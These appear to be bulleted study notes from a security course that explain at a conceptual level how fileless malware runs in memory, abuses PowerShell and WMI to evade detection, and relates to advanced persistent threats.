Fileless Malware
- fileless malware has gained prominence
- not a definitive classification
- describes common behaviors and techniques:
- does not write code to disk
- uses memory-resident techniques to:
- run in its own process
- within a host process or dynamic link library (DLL)
- or within a scripting host
- but does have some disk activity
- may change registry values to achieve persistence
- initial execution may depend on user running a script, file attachment, or trojan package
- uses memory-resident techniques to:
- uses lightweight shellcode to achieve a backdoor mechanism on the host
- shellcode is easy to recompile in an obfuscated form to evade detection by scanners
- able to download additional packages or payloads to achieve objectives
- may use “live off the land” techniques rather than compiled executables to evade detection
- means that malware code uses legitimate system scripting tools to execute payload actions
- i.e., PowerShell and Windows Management Instrumentation (WIM)
- if executed with sufficient permissions
- then these environments provide all the tools needed to perform scanning, reconfigure settings, and exfiltrate data
- means that malware code uses legitimate system scripting tools to execute payload actions
- does not write code to disk
- advanced persistent threat (APT) and advanced volatile threat (AVT) can be used to describe fileless/live off the land malware
- can be classified as low-observable characteristic (LOC)
Advanced Persistent Threat (APT) is an attacker’s ability to obtain, maintain, and diversify access to network systems using exploits and malware.